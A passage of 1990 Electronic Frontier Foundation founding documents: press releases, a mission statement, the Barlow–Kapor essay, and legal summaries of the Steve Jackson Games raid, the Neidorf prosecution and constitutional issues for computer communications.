NEW FOUNDATION ESTABLISHED TO ENCOURAGE COMPUTER-BASED
COMMUNICATIONS POLICIES
 
Washington, D.C., July 10, 1990 -- Mitchell D. Kapor, founder of Lotus
Development Corporation and ON Technology, today announced that he,
along with colleague John Perry Barlow, has established a foundation to
address social and legal issues arising from the impact on society of
the increasingly pervasive use of computers as a means of communication
and information distribution.  The Electronic Frontier Foundation (EFF)
will support and engage in public education on current and future
developments in computer-based and telecommunications media.  In
addition, it will support litigation in the public interest to preserve,
protect and extend First Amendment rights within the realm of computing
and telecommunications technology.

Initial funding for the Foundation comes from private contributions by
Kapor and Steve Wozniak, co-founder of Apple Computer, Inc.  The
Foundation expects to actively raise contributions from a wide
constituency.

As an initial step to foster public education on these issues, the
Foundation today awarded a grant to the Palo Alto, California-based
public advocacy group Computer Professionals for Social Responsibility
(CPSR).  The grant will be used by CPSR to expand the scope of its
on-going Computing and Civil Liberties Project (see attached).

Because its mission is to not only increase public awareness about civil
liberties issues arising in the area of computer-based communications,
but also to support litigation in the public interest, the  Foundation
has recently intervened on behalf of two legal cases.
                                               
 The first case concerns Steve Jackson, an Austin-based game manufacturer
who was the target of the Secret Service's Operation Sun Devil.  The EFF
has pressed for a full disclosure by the government regarding the
seizure of his company's computer equipment.  In the second action, the
Foundation intends to seek amicus curiae  (friend of the court) status
in the government's case against Craig Neidorf, a 20-year-old University
of Missouri student who is the editor of the electronic newsletter
Phrack World News (see attached).

"It is becoming increasingly obvious that the rate of technology
advancement in communications is far outpacing the establishment of
appropriate cultural, legal and political frameworks to handle the
issues that are arising," said Kapor. "And the Steve Jackson and Neidorf
cases dramatically point to the timeliness of the Foundation's mission.
We intend to be instrumental in helping shape a new framework that
embraces these powerful new technologies for the public good."

The use of new digital media -- in the form of on-line information and
interactive conferencing services, computer networks and electronic
bulletin boards -- is becoming widespread in businesses and homes.
However, the electronic society created by these new forms of digital
communications does not fit neatly into existing, conventional legal and
social structures.

The question of how electronic communications should be accorded the
same political freedoms as newspapers, books, journals and other modes
of discourse is currently the subject of discussion among this country's
lawmakers and members of the computer industry.  The EFF will take an
active role in these discussions through its continued funding of
various educational projects and forums.

An important facet of the Foundation's mission is to help both the
public and policy-makers see and understand the opportunities as well as
the challenges posed by developments in computing and
telecommunications.  Also, the EFF will encourage and support the
development of new software to enable non-technical users to more easily
use their computers to access the growing number of digital
communications services available.

The Foundation is located in Cambridge, Mass.  Requests for information
should be sent to Electronic Frontier Foundation, One Cambridge Center,
Suite 300, Cambridge, MA 02142, 617/577-1385, fax 617/225-2347; or it
can be reached at the Internet mail address eff@well.sf.ca.us.
 
       ======================================================

ELECTRONIC FRONTIER FOUNDATION

MISSION STATEMENT

 A new world is arising in the vast web of digital, electronic media
which connect us.  Computer-based communication media like electronic
mail and computer conferencing are becoming the basis of new forms of
community.  These communities without a single, fixed geographical
location comprise the first settlements on an electronic frontier.

While well-established legal principles and cultural norms give
structure and coherence to uses of conventional media like newspapers,
books, and telephones, the new digital media do not so easily fit into
existing frameworks.  Conflicts come about as the law struggles to
define its application in a context where fundamental notions of speech,
property, and place take profoundly new forms. People sense both the
promise and the threat inherent in new computer and communications
technologies, even as they struggle to master or simply cope with them
in the workplace and the home.

The Electronic Frontier Foundation has been established to help civilize
the electronic frontier; to make it truly useful and beneficial not just
to a technical elite, but to everyone; and to do this in a way which is
in keeping with our society's highest traditions of the free and open
flow of information and communication.

To that end, the Electronic Frontier Foundation will:

1.      Engage in and support educational activities which increase
popular understanding of the opportunities and challenges posed by
developments in computing and telecommunications.

2.      Develop among policy-makers a better understanding of the issues
underlying free and open telecommunications, and support the creation of
legal and structural approaches which will ease the assimilation of
these new technologies by society.

3.      Raise public awareness about civil liberties issues arising from
the rapid advancement in the area of new computer-based communications
media.  Support litigation in the public interest to preserve, protect,
and extend First Amendment rights within the realm of computing and
telecommunications technology.

4.      Encourage and support the development of new tools which will
endow non-technical users with full and easy access to computer-based
telecommunications.

======================================================

ACROSS THE ELECTRONIC FRONTIER

by
John Perry Barlow and Mitchell Kapor
Electronic Frontier Foundation
Washington, DC
July 10,1990

Over the last 50 years, the people of the developed world have begun to 
cross into a landscape unlike any which humanity has experienced before.  It
is
a region without physical shape or form. It exists, like a standing wave, in
the vast web of our electronic communication systems. It consists of electron
states, microwaves, magnetic fields, light pulses and thought itself. 

It is familiar to most people as the "place" in which a long-distance
telephone
conversation takes place. But it is also the repository for all digital or
electronically transferred information, and, as such, it is the venue for most
of what is now commerce, industry, and broad-scale human interaction. William
Gibson called this Platonic realm "Cyberspace," a name which has some currency
among its present inhabitants. 

Whatever it is eventually called, it is the homeland of the Information Age,
the place where the future is destined to dwell. 

In its present condition, Cyberspace is a frontier region, populated by the
few
hardy technologists who can tolerate the austerity of its savage computer
interfaces, incompatible communications protocols, proprietary barricades,
cultural and legal ambiguities, and general lack of useful maps or metaphors. 

Certainly, the old concepts of property, expression, identity, movement, and
context, based as they are on physical manifestion, do not apply succinctly in
a world where there can be none. 

Sovereignty over this new world is also not well defined. Large institutions
already lay claim to large fiefdoms, but most of the actual natives are
solitary and independent, sometimes to the point of sociopathy. It is,
therefore, a perfect breeding ground for both outlaws and vigilantes. 

Most of society has chosen to ignore the existence of this arising domain.
Every day millions of people use ATM's and credit cards, place telephone
calls,
make travel reservations, and access information of limitless variety...all
without any perception of the digital machinations behind these transactions. 

Our financial, legal, and even physical lives are increasingly dependent on
realities of which we have only dimmest awareness. We have entrusted the basic
functions of modern existence to institutions we cannot name, using tools
we've
never heard of and could not operate if we had. 

As communications and data technology continues to change and develop at a
pace
many times that of society, the inevitable conflicts have begun to occur on
the
border between Cyberspace and the physical world. 

These are taking a wide variety of forms, including (but hardly limited to)
the following:

I.	Legal and Constitutional Questions 	  

What is free speech and what is merely data? What is a free press without
paper
and ink? What is a "place" in a world without tangible dimensions?  How does
one protect property which has no physical form and can be infinitely and
easily reproduced? Can the history of one's personal business affairs properly
belong to someone else? Can anyone morally  claim to own knowledge itself? 

These are just a few of the questions for which neither law nor custom can
provide concrete answers. In their absence, law enforcement agencies like the
Secret Service and FBI, acting at the disposal of large information
corporations, are seeking to create legal precedents which would radically
limit Constitutional application to digital media. 

The excesses of Operation Sun Devil are only the beginning of what threatens
to become a long, difficult, and philosophically obscure struggle between
institutional control and individual liberty. 

 II.	Future Shock 

Information workers, forced to keep pace with rapidly changing technology, are
stuck on "the learning curve of Sisyphus." Increasingly, they find their
hard-acquired skills to be obsolete even before they've been fully mastered.
To
a lesser extent, the same applies to ordinary citizens who correctly feel a
lack of control over their own lives and identities. 

One result of this is a neo-Luddite resentment of digital technology from
which
little good can come. Another is a decrease in worker productivity ironically
coupled to tools designed to enhance it. Finally, there is a spreading sense
of
alienation, dislocation, and helplessness in the general presence of which no
society can expect to remain healthy. 

 III.	The "Knows" and the "Know-Nots" 

Modern economies are increasingly divided between those who are comfortable
and
proficient with digital technology and those who neither understand nor trust
it. In essence, this development disenfranchises the latter group, denying
them
any possibility of citizenship in Cyberspace and, thus, participation in the
future. 

Furthermore, as policy-makers and elected officials remain relatively ignorant
of computers and their uses, they unknowingly abdicate most of their authority
to corporate technocrats whose jobs do not include general social
responsibility. Elected government is thus replaced by institutions with
little real interest beyond their own quarterly profits.

We are founding the Electronic Frontier Foundation to deal with these and
related challenges. While our agenda is ambitious to the point of audacity, 
we don't see much that these issues are being given the broad social attention
they deserve. We were forced to ask, "If not us, then whom?" 

In fact, our original objectives were more modest. When we first heard about
Operation Sun Devil and other official adventures into the digital realm, we
thought that remedy could be derived by simply unleashing a few highly
competent Constitutional lawyers upon the Government. In essence, we were
prepared to fight a few civil libertarian brush fires and go on about our
private work. 

However, examination of the issues surrounding these government actions
revealed that we were dealing with the symptoms of a much larger malady, the
collision between Society and Cyberspace. 

We have concluded that a cure can lie only in bringing civilization to
Cyberspace. Unless a successful effort is made to render that harsh and
mysterious terrain suitable for ordinary inhabits, friction between the two
worlds will worsen. Constitutional protections, indeed the perceived
legitimacy of representative government itself, might gradually disappear. 

We could not allow this to happen unchallenged, and so arises the Electronic
Frontier Foundation. In addition to our legal interventions on behalf of those
whose rights are threatened, we will: 

* Engage in and support efforts to educate both the general public and policy-
makers about the opportunities and challenges posed by developments in
computing and telecommunications. 

* Encourage communication between the developers of technology, government and
corporate officials, and the general public in which we might define the
appropriate metaphors and legal concepts for life in Cyberspace. 

* And, finally, foster the development of new tools which will endow non-
technical users with full and easy access to computer-based
telecommunications.

One of us, Mitch Kapor, had already been a vocal advocate of more accessible
software design and had given considerable thought to some of the challenges
we now intend to meet.

The other, John Perry Barlow, is a relative newcomer to the world of 
computing (though not to the world of politics) and is therefore well- equipped to act
as
an emissary between the magicians of technology and the wary populace who must
incorporate this magic into their daily lives. 

While we expect the Electronic Frontier Foundation to be a creation of some
longevity, we hope to avoid the sclerosis which organizations usually develop
in their efforts to exist over time. For this reason we will endeavor to
remain
light and flexible, marshalling intellectual and financial resources to meet
specific purposes rather than finding purposes to match our resources. As is
appropriate, we will communicate between ourselves and with our constituents
largely over the electronic Net, trusting self- distribution and
self-organization to a much greater extent than would be possible for a more
traditional organization. 

We readily admit that we have our work cut out for us. However, we are 
greatly
encouraged by the overwhelming and positive response which we  have received
so
far. We hope the Electronic Frontier Foundation can  function as a focal point
for the many people of good will who wish to settle in a future as abundant
and free as the present.
    
======================================================


    FOR IMMEDIATE RELEASE
 
 Contact: Marc Rotenberg (202) 775-1588    
 
 CPSR TO UNDERTAKE EXPANDED CIVIL LIBERTIES PROGRAM 
 
 Washington, D.C., July 10, 1990 -- Computer Professionals for Social
Responsibility (CPSR), a national computing organization, announced
today that it would receive a two-year grant in the amount of $275,000
for its Computing and Civil Liberties Project.  The Electronic Frontier
Foundation (EFF),founded by Mitchell Kapor,  made the grant to expand
ongoing CPSR work on civil liberties protections for computer users. 
 
 At a press conference in Washington today, Mr. Kapor praised CPSR's
work, "CPSR plays an important role in the computer community.  For the
last several years, it has sought to extend civil liberties protections
to new information technologies.  Now we want to help CPSR expand that
work." 
 
 Marc Rotenberg, director of the CPSR Washington Office said, "We are
obviously very happy about the grant from the EFF.  There is a lot of
work that needs to be done to ensure that our civil liberties
protections are not lost amidst policy confusion about the use of new
computer technologies." 
 
 CPSR said that it will host a series of policy round tables in
Washington, DC, during the next two years with lawmakers, computer
users, including (hackers), the FBI, industry representatives, and
members of the computer security community.  Mr. Rotenberg said that the
purpose of the meetings will be to "begin a dialogue about the new uses
of electronic media and the protection of the public interest." 
 
 CPSR also plans to develop policy papers on computers and civil
liberties, to oversee the Government's handling of computer crime
investigations, and to act as an information resource for organizations
and individuals interested in civil liberties issues. 
 
 The CPSR Computing and Civil Liberties project began in 1985 after
President Reagan attempted to restrict access to government computer
systems through the creation of new classification authority.  In 1988,
CPSR prepared a report on the proposed expansion of the FBI's computer
system, the National Crime Information Center.  The report found serious
threats to privacy and civil liberties.  Shortly after the report was
issued, the FBI announced that it would drop a proposed computer feature
to track the movements of people across the country who had not been
charged with any crime. 
 
 "We need to build bridges between the technical community and the policy
community," said Dr. Eric Roberts, CPSR president and a research
scientist at Digital Equipment Corporation in Palo Alto, California.
"There is simply too much misinformation about how computer networks
operate.  This could produce terribly misguided public policy." 
 
 CPSR representatives have testified several times before Congressional
committees on matters involving civil liberties and computer policy.
Last year CPSR urged a House Committee to avoid poorly conceived
computer activity.  "In the rush to criminalize the malicious acts of
the few we may discourage the beneficial acts of the many,"  warned
CPSR.  A House subcommittee recently followed CPSR's recommendations
on computer crime amendments. 
 
 Dr. Ronni Rosenberg, an expert on the role of computer scientists and
public policy, praised the new initiative.  She said, "It's clear that
there is an information gap that needs to be filled.  This is an
important opportunity for computer scientists to help fill the gap." 
 
 CPSR is a national membership organization of computer professionals,
based in Palo Alto, California.  CPSR has over 20,000  members and 21
chapters across the country. In addition to the civil liberties project,
CPSR conducts research, advises policy makers and educates the public
about computers in the workplace, computer risk and reliability, and
international security. 
 
 For more information contact:                 
 
 Marc Rotenberg 
 CPSR Washington Office 
 1025 Connecticut Avenue, NW 
 Suite 1015 
 Washington, DC 20036 202/775-1588 
 
 Gary Chapman 
 CPSR National Office 
 P.O. Box 717 
 Palo Alto, CA 94302 
 415/322-3778 
    
======================================================

(The following is a discussion of legal issues currently engaged by the
Electronic Frontier Foundation)


ELECTRONIC FRONTIER FOUNDATION  

LEGAL CASE SUMMARY
July 10, 1990

The Electronic Frontier Foundation is currently providing litigation
support in two cases in which it perceived there to be substantial civil
liberties  concerns which are likely to prove important in the overall
legal scheme by  which electronic communications will, now and in the
future, be governed,  regulated, encouraged, and protected. 

Steve Jackson Games 

Steve Jackson Games is a small, privately owned adventure game
manufacturer located in Austin, Texas.  Like most businesses today,
Steve Jackson Games uses computers for word processing and bookkeeping.
In addition, like many other manufacturers, the company operates an
electronic bulletin board to advertise and to obtain feedback on its
product ideas and lines. 

One of the company's most recent products is GURPS CYBERPUNK, a science
fiction role-playing game set in a high-tech futuristic world.  The
rules of the game are set out in a game book.  Playing of the game is
not performed on computers and does not make use of computers in any
way.  This game was to be the company's most important first quarter
release, the keystone of its line. 

On March 1, 1990, just weeks before GURPS CYBERPUNK was due to be
released, agents of the United States Secret Service raided the premises
of Steve Jackson Games.  The Secret Service: 

*  seized three of the company's computers which were used in the
drafting  and designing of GURPS CYBERPUNK, including the computer used
to run the electronic bulletin board, 

*  took all of the company software in the neighborhood of the computers
taken, 

*  took with them company business records which were  located on the
computers seized, and 

*  destructively ransacked the company's warehouse, leaving many items
in disarray. 

In addition, all working drafts of the soon-to-be-published GURPS
CYBERPUNK game book -- on disk and in hard-copy manuscript form -- were
confiscated by the authorities.  One of the Secret Service agents told
Steve Jackson that the GURPS CYBERPUNK science fiction fantasy game book
was a, "handbook for computer crime." 

Steve Jackson Games was temporarily shut down.  The company was forced
to lay-off half of its employees and, ever since the raid, has operated
on  relatively precarious ground. 

Steve Jackson Games, which has not been involved in any illegal activity
insofar as the Foundation's inquiries have been able to determine, tried
in  vain for over three months to find out why its property had been
seized, why  the property was being retained by the Secret Service long
after it should have  become apparent to the agents that GURPS CYBERPUNK
and everything else in the company's repertoire were entirely lawful and
innocuous, and when the company's vital materials would be returned.  In
late June of this year, after attorneys for the Electronic Frontier
Foundation became involved in the case, the Secret Service finally
returned most of the property, but retained a number of documents,
including the seized drafts of GURPS CYBERPUNKS. 

The Foundation is presently seeking to find out the basis for the search
warrant that led to the raid on Steve Jackson Games.  Unfortunately, the
application for that warrant remains sealed by order of the court.  The
Foundation is making efforts to unseal those papers in order to find out
what  it was that the Secret Service told a judicial officer that
prompted that  officer to issue the search warrant. 

Under the Fourth Amendment to the United States Constitution, a search
warrant may be lawfully issued only if the information presented to the
court by the government agents demonstrates "probable cause" to believe
that evidence of criminal conduct would be found on the premises to be
searched.  Unsealing the search warrant application should enable the
Foundation's lawyers, representing Steve Jackson Games, to determine the
theory by which Secret Service Agents concluded or hypothesized that
either the GURPS CYBERPUNK game or any of the company's computerized
business records constituted criminal activity or contained evidence of
criminal activity. 

Whatever the professed basis of the search, its scope clearly seems to
have  been unreasonably broad.  The wholesale seizure of computer
software, and  subsequent rummaging through its contents, is precisely
the sort of general  search that the Fourth Amendment was designed to
prohibit.   

If it is unlawful for government agents to indiscriminately seize all of
the  hard-copy filing cabinets on a business premises -- which it surely
is -- that  the same degree of protection should apply to businesses
that store information electronically. 

The Steve Jackson Games situation appears to involve First Amendment
violations as well.  The First Amendment to the United States
Constitution prohibits the government from "abridging the freedom of
speech, or of the press".  The government's apparent attempt to prevent
the publication of the GURPS CYBERPUNK game book by seizing all copies
of all drafts in all media prior to publication, violated the First
Amendment.  The particular type of First Amendment violation here is the
single most serious type, since the government, by seizing the very
material sought to be published, effectuated what is known in the law as
a "prior restraint" on speech.  This means that rather than allow the
material to be published and then seek to punish it, the government
sought instead to prevent publication in the first place.  (This is not
to say, of course, that anything published by Steve Jackson Games could
successfully have been punished.  Indeed, the opposite appears to be the
case, since SJG's business seems to be entirely lawful.)  In any effort
to restrain publication, the government bears an extremely heavy burden
of proof before a court is permitted to authorize a prior restraint. 

Indeed, in its 200-year history, the Supreme Court has never upheld a
prior  restraint on the publication of material protected by the First
Amendment,  warning that such efforts to restrain publication are
presumptively  unconstitutional.  For example, the Department of Justice
was unsuccessful in  1971 in obtaining the permission of the Supreme
Court to enjoin The New York Times, The Washington Post, and The Boston
Globe from publishing the so-called Pentagon Papers, which the
government strenuously argued should be enjoined because of a perceived
threat to national security.  (In 1979, however, the government sought
to prevent The Progressive magazine from publishing an article
purporting to instruct the reader as to how to manufacture an atomic
bomb.  A lower federal court actually imposed an order for a temporary
prior restraint that lasted six months.  The Supreme Court never had an
opportunity to issue a full ruling on the constitutionality of that
restraint, however, because the case was mooted when another newspaper
published the article.) 

Governmental efforts to restrain publication thus have been met by
vigorous  opposition in the courts.  A major problem posed by the
government's resort to the expedient of obtaining a search warrant,
therefore, is that it allows the government to effectively prevent or
delay publication without giving the  citizen a ready opportunity to
oppose that effort in court.  

The Secret Service managed to delay,  and almost to prevent, the
publication of an innocuous game book by a legitimate company -- not by
asking a court for a prior restraint order that it surely could not have
obtained, but by asking  instead for a search warrant, which it obtained
all too readily. 

The seizure of the company's computer hardware is also problematic, for
it  prevented the company not only from publishing GURPS CYBERPUNK, but
also from operating its electronic bulletin board.  The government's
action in shutting down such an electronic bulletin board is the
functional equivalent of shutting down printing presses of The New York
Times or The Washington Post  in order to prevent publication of The
Pentagon Papers.  Had the government sought a court order closing down
the electronic bulletin board, such an order effecting a prior restraint
almost certainly would have been refused.  Yet by obtaining the search
warrant, the government effected the same result. 

This is a stark example of how electronic media suffer under a less
stringent  standard of constitutional protection than applies to the
print media -- for no  apparent reason, it would appear, other than the
fact that government agents  and courts do not seem to readily equate
computers with printing presses and  typewriters.  It is difficult to
understand a difference between these media  that should matter for
constitutional protection purposes.  This is one of the  challenges
facing the Electronic Frontier Foundation. 

The Electronic Frontier Foundation will continue to press for return of
the  remaining property of Steve Jackson Games and will take formal
steps, if  necessary, to determine the factual basis for the search.
The purpose of these  efforts is to establish law applying the First and
Fourth Amendments to  electronic media, so as to protect in the future
Steve Jackson Games as well as  other individuals and businesses from
the devastating effects of unlawful and  unconstitutional government
intrusion upon and interference  with protected property and speech
rights. 

United States v. Craig Neidorf 

Craig Neidorf is a 20-year-old student at the University of Missouri who
has  been indicted by the United States on several counts of interstate
wire fraud  and interstate transportation of stolen property in
connection with his  activities as editor and publisher of the
electronic magazine, Phrack. 

The indictment charges Neidorf with:  (1) wire fraud and interstate
transportation of stolen property for the republication in Phrack of
information which was allegedly illegally obtained through the accessing
of a  computer system without authorization, though it was obtained not
by Neidorf but by a third party; and (2) wire fraud for the publication
of an   announcement of a computer conference and for the publication of
articles which allegedly provide some suggestions on how to bypass
security in some computer systems. 

The information obtained without authorization is a file relating to the
provision of 911 emergency telephone services that was allegedly removed
from the BellSouth computer system without authorization.  It is
important to note that neither the indictment, nor any briefs filed in
this case by the  government, contain any factual allegation or
contention that Neidorf was  involved in or participated in the removal
of the 911 file. 

These indictments raise substantial constitutional issues which have
significant impact on the uses of new computer communications
technologies.  The prosecution of an editor or publisher, under
generalized statutes like wire  fraud and interstate transportation of
stolen property, for the publication of  information received lawfully,
which later turns out to be have been "stolen," presents an
unprecedented threat to the freedom of the press.  The person who should
be prosecuted is the thief, and not a publisher who subsequently
receives and publishes information of public interest.  To draw an
analogy to the print media, this would be the equivalent of prosecuting
The New York Times and The Washington Post for publishing the Pentagon
Papers when those papers were dropped off at the doorsteps of those
newspapers. 

Similarly, the prosecution of a publisher for wire fraud arising out of
the  publication of articles that allegedly suggested methods of
unlawful activity  is also unprecedented.  Even assuming that the
articles here did advocate  unlawful activity, advocacy of unlawful
activity cannot constitutionally be the basis for a criminal
prosecution, except where such advocacy is directed at  producing
imminent lawless action, and is likely to incite such action.  The
articles here simply do not fit within this limited category.  The
Supreme  Court has often reiterated that in order for advocacy to be
criminalized, the  speech must be such that the words trigger an
immediate action.  Criminal  prosecutions such as this pose an extreme
hazard for First Amendment rights in all media of communication, as it
has a chilling effect on writers and  publishers who wish to discuss the
ramifications of illegal activity, such as  information describing
illegal activity or describing how a crime might be  committed. 

In addition, since the statutes under which Neidorf is charged clearly
do not  envision computer communications, applying them to situations
such as that  found in the Neidorf case raises fundamental questions of
fair notice -- that  is to say, the publisher or computer user has no
way of knowing that his  actions may in fact be a violation of criminal
law.  The judge in the case has  already conceded that "no court has
ever held that the electronic transfer of  confidential, proprietary
business information from one computer to another  across state lines
constitutes a violation of [the wire fraud statute]."  The  Due Process
Clause prohibits the criminal prosecution of one who has not had fair
notice of the illegality of his action.  Strict adherence to the
requirements of the Due Process Clause also minimizes the risk of
selective or arbitrary enforcement, where prosecutors decide what
conduct they do not like and then seek some statute that can be
stretched by some theory to cover that conduct. 

Government seizure and liability of bulletin board systems 

During the recent government crackdown on computer crime, the government
has on many occasions seized the computers which operate bulletin board
systems ("BBSs"), even though the operator of the bulletin board is not
suspected of any complicity in any alleged criminal activity.  The
government seizures go far beyond a "prior restraint" on the publication
of any specific article, as  the seizure of the computer equipment of a
BBS prevents the BBS from publishing at all on any subject.  This akin
to seizing the word processing and  computerized typesetting equipment
of The New York Times for publishing the Pentagon Papers, simply because
the government contends that there may be information relating to the
commission of a crime on the system.  Thus, the government does not
simply restrain the publication of the "offending"  document, but it
seizes the means of production of the First Amendment activity so that
no more stories of any type can be published. 

The government is allowed to seize "instrumentalities of crime," and a
bulletin board and its associated computer system could arguably be
called an  instrumentality of crime if individuals used its private
e-mail system to send  messages in furtherance of criminal activity.
However, even if the government has a compelling interest in interfering
with First Amendment protected speech, it can only do so by the least
restrictive means.  Clearly, the wholesale seizure and retention of a
publication's means of production, i.e., its computer system, is not the
least restrictive alternative.  The government  obviously could seize
the equipment long enough to make a copy of the  information stored on
the hard disk and to copy any other disks and documents, and then
promptly return the computer system to the operator. 

Another unconstitutional aspect of the government seizures of the
computers of bulletin board systems is the government infringement on
the privacy of the electronic mail in the systems.  It appears that the
government, in seeking warrants for the seizures, has not forthrightly
informed the court that private mail of third parties is on the
computers, and has also read some of this private mail after the systems
have been seized. 

The Neidorf case also raises issues of great significance to bulletin
board  systems.  As Neidorf was a publisher of information he received,
BBSs could be considered publishers of information that its users post
on the boards.  BBS  operators have a great deal of concern as to the
liability they might face for  the dissemination of information on their
boards which may turn out to have been obtained originally without
authorization, or which discuss activity which may be considered
illegal.  This uncertainty as to the law has already caused a decrease
in the free flow of information, as some BBS operators have removed
information solely because of the fear of liability. 

The Electronic Frontier Foundation stands firmly against the
unauthorized  access of computer systems, computer trespass and computer
theft, and strongly supports the security and sanctity of private
computer systems and networks. One of the goals of the Foundation,
however, is to ensure that, as the legal framework is established to
protect the security of these computer systems, the unfettered
communication and exchange of ideas is not hindered.  The Foundation is
concerned that the Government has cast its net too broadly, ensnaring
the innocent and chilling or indeed supressing the free flow of
information.  The Foundation fears not only that protected speech will
be curtailed, but also that the citizen's reasonable expectation in the
privacy and sanctity of electronic communications systems will be
thwarted, and people will be hesitant to communicate via these networks.
Such a lack of confidence in electronic communication modes will
substantially set back the kind of experimentation by and communication
among fertile minds that are essential to our nation's development.  The
Foundation has therefore applied for amicus curiae  (friend of the
court) status in the Neidorf case and has filed legal briefs in support
of the First Amendment issues there, and is prepared to assist in
protecting the free flow of information over bulletin board systems and
other computer technologies. 

For further information regarding Steve Jackson Games please contact: 

Harvey Silverglate or Sharon Beckman
Silverglate & Good
89 Broad Street, 14th Floor
Boston, MA  02110
617/542-6663

For further information regarding Craig Neidorf please contact:

Terry Gross or Eric Lieberman
Rabinowitz, Boudin, Standard, Krinsky and Lieberman
740 Broadway, 5th Floor
New York, NY 10003
212/254-1111
 
======================================================
 
LEGAL OVERVIEW

THE ELECTRONIC FRONTIER AND THE BILL OF RIGHTS

Advances in computer technology have brought us to a new frontier in
communications, where the law is largely unsettled and woefully
inadequate to deal with the problems and challenges posed by electronic
technology.  How the law develops in this area will have a direct impact
on the electronic communications experiments and innovations being
devised day in and day out by millions of citizens on both a large and
small scale from coast to coast. Reasonable balances have to be struck
among:

*       traditional civil liberties         
*       protection of intellectual property         
*       freedom to experiment and innovate                
*       protection of the security and integrity of computer
        systems from improper governmental and private
        interference.

Striking these balances properly will not be easy, but if they are
struck too far in one direction or the other, important social and legal
values surely will be sacrificed.

Helping to see to it that this important and difficult task is done
properly is a major goal of the Electronic Frontier Foundation.  It is
critical to assure that these lines are drawn in accordance with the
fundamental constitutional rights that have protected individuals from
government excesses since our nation was founded -- freedom of speech,
press, and association, the right to privacy and protection from
unwarranted governmental intrusion, as well as the right to procedural
fairness and due process of law.

The First Amendment

The First Amendment to the United States Constitution prohibits the
government from "abridging the freedom of speech, or of the press," and
guarantees freedom of association as well.  It is widely considered to
be the single most important of the guarantees contained in the Bill of
Rights, since free speech and association are fundamental in securing
all other rights.

The First Amendment throughout history has been challenged by every
important technological development.  It has enjoyed only a mixed record
of success.  Traditional forms of speech -- the  print media and public
speaking -- have enjoyed a long and rich history of freedom from
governmental interference.  The United States Supreme Court has not
afforded the same degree of freedom to electronic broadcasting,
however.

Radio and television communications, for example, have been subjected to
regulation and censorship by the Federal Communications Commission
(FCC), and by the Congress.  The Supreme Court initially justified
regulation of the broadcast media on technological grounds -- since
there were assumed to be a finite number of radio and television
frequencies, the Court believed that regulation was necessary to prevent
interference among frequencies and to make sure that scarce resources
were allocated fairly.  The multiplicity of cable TV networks has
demonstrated the falsity of this "scarce resource" rationale, but the
Court has expressed a reluctance to abandon its outmoded approach
without some signal from Congress or the FCC.

Congress has not seemed overly eager to relinquish even
counterproductive control over the airwaves.  Witness, for example,
legislation and rule-making in recent years that have kept even
important literature, such as the poetry of Allen Ginsberg, from being
broadcast on radio because of language deemed "offensive" to regulators.
Diversity and experimentation have been sorely hampered by these rules.

The development of computer technology provides the perfect opportunity
for lawmakers and courts to abandon much of the distinction between the
print and electronic media and to extend First Amendment protections to
all communications regardless of the medium.  Just as the multiplicity
of cable lines has rendered obsolete the argument that television has to
be regulated because of a scarcity of airwave frequencies, so has the
ready availability of virtually unlimited computer communication
modalities made obsolete a similar argument for harsh controls in this
area.  With the computer taking over the role previously played by the
typewriter and the printing press, it would be a constitutional disaster
of major proportions if the treatment of computers were to follow the
history of regulation of radio and television, rather than the history
of freedom of the press.

To the extent that regulation is seen as necessary and proper, it should
foster the goal of allowing maximum freedom, innovation and
experimentation in an atmosphere where no one's efforts are sabotaged by
either government or private parties.  Regulation should be limited by
the adage that quite aptly describes the line that separates reasonable
from unreasonable regulation in the First Amendment area:  "Your liberty
ends at the tip of my nose."

As usual, the law lags well behind the development of technology.  It is
important to educate  lawmakers and judges about new technologies, lest
fear and ignorance of the new and unfamiliar, create barriers to free
communication, expression, experimentation, innovation, and other such
values that help keep a nation both free and vigorous.

The Fourth Amendment

The Fourth Amendment guarantees "the right of the people to be secure in
their persons, houses, papers, and effects, against unreasonable
searches and seizures."  Judges are not to issue search warrants for
private property unless the law enforcement officer seeking the warrant
demonstrates the existence of "a probable cause, supported by Oath or
affirmation, and particularly describing the place to be searched, and
the persons or things to be seized." In short, the scope of the search
has to be as narrow as possible, and there has to be good reason to
believe that the search will turn up evidence of illegal activity.

The meaning of the Fourth Amendment's guarantee has evolved over time in
response to changing technologies.  For example, while the Fourth
Amendment was first applied to prevent the government from trespassing
onto private property and seizing tangible objects, the physical
trespass rationale was made obsolete by the development of electronic
eavesdropping devices which permitted the government to "seize" an
individual's words without ever treading onto that person's private
property.  To put the matter more concretely, while the drafters of the
First Amendment surely knew nothing about electronic databases, surely
they would have considered one's database to be as sacrosanct as, for
example, the contents of one's private desk or filing cabinet.

The Supreme Court responded decades ago to these types of technological
challenges by interpreting the Fourth Amendment more broadly to prevent
governmental violation of an individual's reasonable expectation of
privacy, a concept that transcended the narrow definition of one's
private physical space.  It is now well established that an individual
has a reasonable expectation of  privacy, not only in his or her home
and business, but also in private  communications.  Thus, for example:

*  Government wiretapping and electronic eavesdropping are   now limited
by state and federal statutes enacted to  effectuate and even to expand
upon Fourth Amendment protections.

*  More recently, the Fourth Amendment has been used, albeit with
limited success, to protect individuals from undergoing   certain random
mandatory drug testing imposed by  governmental authorities.

Advancements in technology have also worked in the opposite direction,
to diminish expectations of privacy that society once considered
reasonable, and thus have helped limit the scope of Fourth Amendment
protections.  Thus, while one might once have reasonably expected
privacy in a fenced-in field, the Supreme Court has recently told us
that such an expectation is not reasonable in an age of surveillance
facilitated by airplanes and zoom lenses.

Applicability of Fourth Amendment to computer media

Just as the Fourth Amendment has evolved in response to changing
technologies, so it must now be interpreted to protect the reasonable
expectation of privacy of computer users in, for example, their
electronic mail or electronically stored secrets.  The extent to which
government intrusion into these private areas should be allowed, ought
to be debated openly, fully, and intelligently, as the Congress seeks to
legislate in the area, as courts decide cases, and as administrative,
regulatory, and prosecutorial agencies seek to establish their turf.

One point that must be made, but which is commonly misunderstood, is
that the Bill of Rights seeks to protect citizens from privacy invasions
committed by the government, but, with very few narrow exceptions, these
protections do not serve to deter private citizens from doing what the
government is prohibited from doing.  In short, while the Fourth
Amendment limits the government's ability to invade and spy upon private
databanks, it does not protect against similar invasions by private
parties.  Protection of citizens from the depredations of other citizens
requires the passage of privacy legislation.

The Fifth Amendment

The Fifth Amendment assures citizens that they will not "be deprived of
life, liberty, or property, without due process of law" and that private
property shall not "be taken for public use without just compensation."
This Amendment thus protects both the sanctity of private property and
the right of citizens to be proceeded against by fair means before they
may be punished for alleged infractions of the law.

One aspect of due process of law is that citizens not be prosecuted for
alleged violations of laws that are so vague that persons of reasonable
intelligence cannot be expected to assume that some prosecutor will
charge that his or her conduct is criminal.  A hypothetical law, for
example, that makes it a crime to do "that which should not be done",
